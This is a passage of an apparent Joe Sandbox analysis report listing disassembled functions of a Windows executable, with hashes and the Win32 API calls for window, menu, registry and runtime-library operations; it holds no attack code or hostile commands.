Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 62fe3fbabbec4f58d158fb8ae6d67440dffb2b10d285506c6e1c03bc43a10335
Instruction ID: aa29f6ff63beacfe6a07d2ce8ba69ea93783b160df2b2074c40601ad138979dd
Opcode Fuzzy Hash: 62fe3fbabbec4f58d158fb8ae6d67440dffb2b10d285506c6e1c03bc43a10335
Instruction Fuzzy Hash: 4E1182325012315BDB315B6988C0B2EE7E8DF54BA0F150297ED04DB300F764DC0186D2

Function 00BFEE07 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BFEE13
GetWindow.USER32(00000000), ref: 00BFEE1A
GetWindowLongA.USER32(00000000,000000F0), ref: 00BFEE56
ShowWindow.USER32(00000000,00000000), ref: 00BFEE71
ShowWindow.USER32(00000000,00000004), ref: 00BFEE95
GetWindow.USER32(00000000,00000002), ref: 00BFEE9E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: cc313118c79187ad1f9f8c574fe7b5ef0d2b37ac3a1bbad5df6c8d8e48615413
Instruction ID: 348fab18667b35d28f32d8c5b1724dcfbc0a54d2eb435d779c967d4c057a6b1e
Opcode Fuzzy Hash: cc313118c79187ad1f9f8c574fe7b5ef0d2b37ac3a1bbad5df6c8d8e48615413
Instruction Fuzzy Hash: E011C13150074DABD771DB24AC89F3F7AF9DB81760F240598F625971B0DB78DC448615

Function 00C4EB13 Relevance: 9.1, APIs: 6, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00C4EB55
GetMenuState.USER32(?,00000000,00000400), ref: 00C4EB72
GetMenuItemID.USER32(?,00000000), ref: 00C4EB81
CheckMenuItem.USER32(?,00000000,00000008), ref: 00C4EB95
EnableMenuItem.USER32(?,00000000,00000002), ref: 00C4EBA7
EnableMenuItem.USER32(?,00000000,00000001), ref: 00C4EBB9

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Item$Enable$CheckCountException@8H_prolog3StateThrow
String ID:
API String ID: 4237646742-0
Opcode ID: efcb0c16de672d24c4457e9ed3405668fc58a7094cb3f4ec81c06e8e6387da55
Instruction ID: 53a602d340f5de6ea8af592e2beb7317a58a160f4f13f881639a64001dfd6447
Opcode Fuzzy Hash: efcb0c16de672d24c4457e9ed3405668fc58a7094cb3f4ec81c06e8e6387da55
Instruction Fuzzy Hash: 57216A30900248FFDB119B64CD8AF9DBBF5FF40704F058498F812A51A1DB71AE50DB10

Function 00BD4FA0 Relevance: 9.1, APIs: 6, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 00BD4FC8
RegDeleteValueA.ADVAPI32(00000000,?), ref: 00BD4FE7
RegCloseKey.ADVAPI32(00000000), ref: 00BD5011

Part of subcall function 00BD4D93: RegCloseKey.ADVAPI32(?), ref: 00BD4E38
Part of subcall function 00BD4D93: RegCloseKey.ADVAPI32(?), ref: 00BD4E42

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00BD502C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Close$Delete$PrivateProfileStringValueWrite
String ID:
API String ID: 1330817964-0
Opcode ID: 1253eb30daae35eb490e1edac61b2a52b0b6a701744ea006b4a95f64301a9574
Instruction ID: e04a71757f2415bf54c1c2e21bab9e483c5a81c54c785f7916a59a86a7ac7afc
Opcode Fuzzy Hash: 1253eb30daae35eb490e1edac61b2a52b0b6a701744ea006b4a95f64301a9574
Instruction Fuzzy Hash: 9C117333000155FFCF316FA0DCC8AAEBBA9EF08351B018476F61A55120E7329D51DBA1

Function 00BE314C Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00BE3168
GetDlgCtrlID.USER32(00000000), ref: 00BE3179
GetWindowLongA.USER32(00000000,000000F0), ref: 00BE3189
GetWindowRect.USER32(00000000,00000000), ref: 00BE31AB
PtInRect.USER32(00000000,00000000,00000000), ref: 00BE31BB
GetWindow.USER32(?,00000005), ref: 00BE31C8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 25e613ec603a40ebd08fe5a373b311d5e8a28495c13a0951f1e91dd6dc94c41a
Instruction ID: d04c2681bbfa802ef75708bd5f86e98a34c6eb7fc7997f90b619a580fa09b37d
Opcode Fuzzy Hash: 25e613ec603a40ebd08fe5a373b311d5e8a28495c13a0951f1e91dd6dc94c41a
Instruction Fuzzy Hash: A6119A72900659AFDB01DF96CC48BAE77F8EF05762F114169F801B7190DB78AB018BA6

Function 00C2D30D Relevance: 9.1, APIs: 6, Instructions: 56windowtimeCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C2D320

Part of subcall function 00BE24E2: GetDlgCtrlID.USER32(?), ref: 00BE24EB

SendMessageA.USER32(?,00000111,?,?), ref: 00C2D349
SetCapture.USER32(?,?,?,?,00C27661,?,?,?), ref: 00C2D372
InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C27661,?,?,?), ref: 00C2D38A
UpdateWindow.USER32(?), ref: 00C2D393
SetTimer.USER32(?,00000001,?,00000000), ref: 00C2D3AA

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CaptureCtrlInvalidateMessageParentRectSendTimerUpdateWindow
String ID:
API String ID: 171814724-0
Opcode ID: 982f562368740a4ef13b4680943878d3a7e8799bfdae57acc455130983efbef1
Instruction ID: 48c9a8e28d4852c4227e6382746a451ed8c0e46d7496c496ca986170433bbbbd
Opcode Fuzzy Hash: 982f562368740a4ef13b4680943878d3a7e8799bfdae57acc455130983efbef1
Instruction Fuzzy Hash: F9111C72200B50AFD7319B31DC49F6BBBF9FB95701F10451AF59A8A670DB70A8019B11

Function 00BE32A6 Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00BE32AC
GetParent.USER32(00000000), ref: 00BE32D4

Part of subcall function 00BE3099: GetWindowLongA.USER32(?,000000F0), ref: 00BE30BA
Part of subcall function 00BE3099: GetClassNameA.USER32(?,?,0000000A), ref: 00BE30CF
Part of subcall function 00BE3099: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 00BE30E9

GetWindowLongA.USER32(?,000000F0), ref: 00BE32EF
GetParent.USER32(?), ref: 00BE32FD
GetDesktopWindow.USER32 ref: 00BE3301
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00BE3315

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
String ID:
API String ID: 1233893325-0
Opcode ID: fb8fb577d1de95189787bffe7708c2866b4d9e2091c25e5a04ac4c5f24f72b97
Instruction ID: 03694285396d13ac3cc00bfe7935d1d45580b1b377a1b39acaae2b066e16f8d3
Opcode Fuzzy Hash: fb8fb577d1de95189787bffe7708c2866b4d9e2091c25e5a04ac4c5f24f72b97
Instruction Fuzzy Hash: 0901D1322002D12BD62166375CDDF3E2AEDDBC5F60F050065F605A71828F64ED014569

Function 00CCECC0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00CCECCC

Part of subcall function 00CCD4D1: __getptd_noexit.LIBCMT ref: 00CCD4D4
Part of subcall function 00CCD4D1: __amsg_exit.LIBCMT ref: 00CCD4E1

__amsg_exit.LIBCMT ref: 00CCECEC
__lock.LIBCMT ref: 00CCECFC
InterlockedDecrement.KERNEL32(?), ref: 00CCED19
_free.LIBCMT ref: 00CCED2C
InterlockedIncrement.KERNEL32(02FD1650), ref: 00CCED44

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 6b68022720f528b0d452aeb303153148cc57be2746ef203480705cdf611a4212
Instruction ID: a6ea8e143746ace0271bb88b57cfced0f485eca1d3645b79630f43ff685b5a2a
Opcode Fuzzy Hash: 6b68022720f528b0d452aeb303153148cc57be2746ef203480705cdf611a4212
Instruction Fuzzy Hash: C501AD31D407219BC720AB28D485F5DB7B0BF15B20F18442EEC21A7290CB34AE42EBE1

Function 00BF9185 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 294keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE2429: GetWindowLongA.USER32(?,000000EC), ref: 00BE2434

GetClientRect.USER32(?,?), ref: 00BF92B0
GetAsyncKeyState.USER32(00000011), ref: 00BF9356

Strings

', xrefs: 00BF9201

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AsyncClientLongRectStateWindow
String ID: '
API String ID: 304971295-1997036262
Opcode ID: 97c12c1a77f33e2241cbcf31c0d1857781e923cc9385c3880cb88bf5b7c0ecd4
Instruction ID: e3b58d19c829f1cdacbb88e677b7710e1e739e9b4ac85090cae98dfd23b5660c
Opcode Fuzzy Hash: 97c12c1a77f33e2241cbcf31c0d1857781e923cc9385c3880cb88bf5b7c0ecd4
Instruction Fuzzy Hash: 32B16C3070060A9BDB299F68C4D9BBDB7E1FF58704F1405ADE646DB290DB709D89CB81

Function 00C2CF04 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 00C2CFB7
DeleteObject.GDI32(?), ref: 00C2D076
DeleteObject.GDI32(?), ref: 00C2D07B
DeleteObject.GDI32(?), ref: 00C2D085

Strings

, xrefs: 00C2CFDC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Delete
String ID:
API String ID: 774837909-3916222277
Opcode ID: 28b623b4a0c744565147249f949d8e6cd21baee8ca2ecacd1515233ef518aa03
Instruction ID: c1814a654a3dc0a2af1834810ecd2e3388c41959db57aae971738b224e1b1890
Opcode Fuzzy Hash: 28b623b4a0c744565147249f949d8e6cd21baee8ca2ecacd1515233ef518aa03
Instruction Fuzzy Hash: 3D518130900629DFCF21DF94E9C09AEB7F2FB94350F20446AE826A3650D7719F86DB90

Function 00BD9955 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 00BD996D
_memset.LIBCMT ref: 00BD99E5
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00BD9A47
LoadBitmapW.USER32(00000000,00007FE3), ref: 00BD9A5F

Strings

, xrefs: 00BD99C6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 6328b28decc89904de62b6eb34a5ee037837286f0b96023f95cc264b128fbbb7
Instruction ID: aa561edfb8664bae4a521cd2c7165df4c42383c8e2a9d9593afc56b22ba8564c
Opcode Fuzzy Hash: 6328b28decc89904de62b6eb34a5ee037837286f0b96023f95cc264b128fbbb7
Instruction Fuzzy Hash: 2D310572E002159FEB208F28DCC5BADBBB4FB44704F4541ABE549EB281EA359D44CB60

Function 00BD2300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00BD2316

Part of subcall function 00CDC691: std::exception::exception.LIBCMT ref: 00CDC6A6
Part of subcall function 00CDC691: __CxxThrowException@8.LIBCMT ref: 00CDC6BB

std::_Xinvalid_argument.LIBCPMT ref: 00BD234D

Part of subcall function 00CDC644: std::exception::exception.LIBCMT ref: 00CDC659
Part of subcall function 00CDC644: __CxxThrowException@8.LIBCMT ref: 00CDC66E

_memmove.LIBCMT ref: 00BD23AB

Strings

invalid string position, xrefs: 00BD2311
string too long, xrefs: 00BD2348

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$_memmove
String ID: invalid string position$string too long
API String ID: 3836225697-4289949731
Opcode ID: d812e87d2569c2f5d97e921f22db07aa94d7d1aaec5b32835c4a1a979c1fefb3
Instruction ID: 45a80f7ecb1d1d5222402e331f86c7fc954bc132c4af8d818d0255dd0fa59693
Opcode Fuzzy Hash: d812e87d2569c2f5d97e921f22db07aa94d7d1aaec5b32835c4a1a979c1fefb3
Instruction Fuzzy Hash: CE2180323046904FCB259B6CE841A6AF7E9EBB1771B2009BFF142CB341E675D841C7A9

Function 00C4237F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C423C1
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00C423FC
OffsetRect.USER32(?,?,?), ref: 00C4240C
CopyRect.USER32(?,?), ref: 00C4241A

Strings

,, xrefs: 00C423D5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CopyInfoOffsetParametersSystemWindow
String ID: ,
API String ID: 401166719-3772416878
Opcode ID: a3ab94ddd81050fa6b4e592e69703609e66e1faa77fe41a56df7e77268a985c3
Instruction ID: 01314333b6c3337b332a5de13ec7e0eafeaa6724e06875e33bb9a9cf9adf81bd
Opcode Fuzzy Hash: a3ab94ddd81050fa6b4e592e69703609e66e1faa77fe41a56df7e77268a985c3
Instruction Fuzzy Hash: 0D213832A00249AFDF14DFE5D889FAEBBB9FF48300F550059F511A7190DB71AA01DB61

Function 00BD55C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Edit, xrefs: 00BD5620

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: b9f0a63aa603c3940c2fbc1278353e9c473b968fc1e2caa1bad70f68e338d4e5
Instruction ID: e03c7fe63d122e81f42a232ca61c7ef7527377f38bfd2c9b6b0b9974feb9ef93
Opcode Fuzzy Hash: b9f0a63aa603c3940c2fbc1278353e9c473b968fc1e2caa1bad70f68e338d4e5
Instruction Fuzzy Hash: 3411C230300A01BBDE311A269C49F6AFAE9EF11754F5805E7F406D62A0EB71DC10D610

Function 00C057FF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(DWMAPI), ref: 00C05829
GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 00C05839
DeleteObject.GDI32(00000000), ref: 00C05873

Strings

DwmSetIconicThumbnail, xrefs: 00C05833
DWMAPI, xrefs: 00C0581E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressDeleteHandleModuleObjectProc
String ID: DWMAPI$DwmSetIconicThumbnail
API String ID: 3128169092-3761315311
Opcode ID: 84ac0af164865dd1f06e9e62b538dcbe4d22b7115f0530d2d0f89df4aef74ae9
Instruction ID: c70b4e72e39d2147e09d2ab579a37825c4f02364c0d27494a7b0e35a53e94820
Opcode Fuzzy Hash: 84ac0af164865dd1f06e9e62b538dcbe4d22b7115f0530d2d0f89df4aef74ae9
Instruction Fuzzy Hash: 77016175641644BFDB006BA58C88F6FB79CEB44710B008139F921972D1DAB4DA00CB61

Function 00BFDB39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BFDB4D
GetProcAddress.KERNEL32(00000000,CreateFileTransactedA), ref: 00BFDB5D
CreateFileA.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BFDB9C

Strings

CreateFileTransactedA, xrefs: 00BFDB57
kernel32.dll, xrefs: 00BFDB48

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFileTransactedA$kernel32.dll
API String ID: 2580138172-3827029016
Opcode ID: ec6d6eaccfca1ef10bb0e334d151a3503d6893f500a4c7544ffd6232f604295e
Instruction ID: c91d18d539479287d76d252673e70005529daf8bc4267c8c8c01be948873b732
Opcode Fuzzy Hash: ec6d6eaccfca1ef10bb0e334d151a3503d6893f500a4c7544ffd6232f604295e
Instruction Fuzzy Hash: 0501D632100149FFCF221F95DC48DABBF77EF88760B158529FA2556061C7728865EB61

Function 00BE3AAD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BE3AD6
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00BE3AE6

Part of subcall function 00BDA23C: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BDA250
Part of subcall function 00BDA23C: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00BDA260

Strings

Advapi32.dll, xrefs: 00BE3AD1
RegDeleteKeyExA, xrefs: 00BE3AE0

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExA
API String ID: 1646373207-1984814126
Opcode ID: 5de0bdcbcd5808f8c2c5953e799c6af6a08b2e4ca601e85b7517309e85a6c93d
Instruction ID: 9a4fb5524b160906c5a01fcb3a2a97c488dabcbf44a1af0a35bb3f296720d755
Opcode Fuzzy Hash: 5de0bdcbcd5808f8c2c5953e799c6af6a08b2e4ca601e85b7517309e85a6c93d
Instruction Fuzzy Hash: 61F0D135604281FFDB208F66DC48FA97FD4EF14B51F044068F48282260C7B2A940EB20

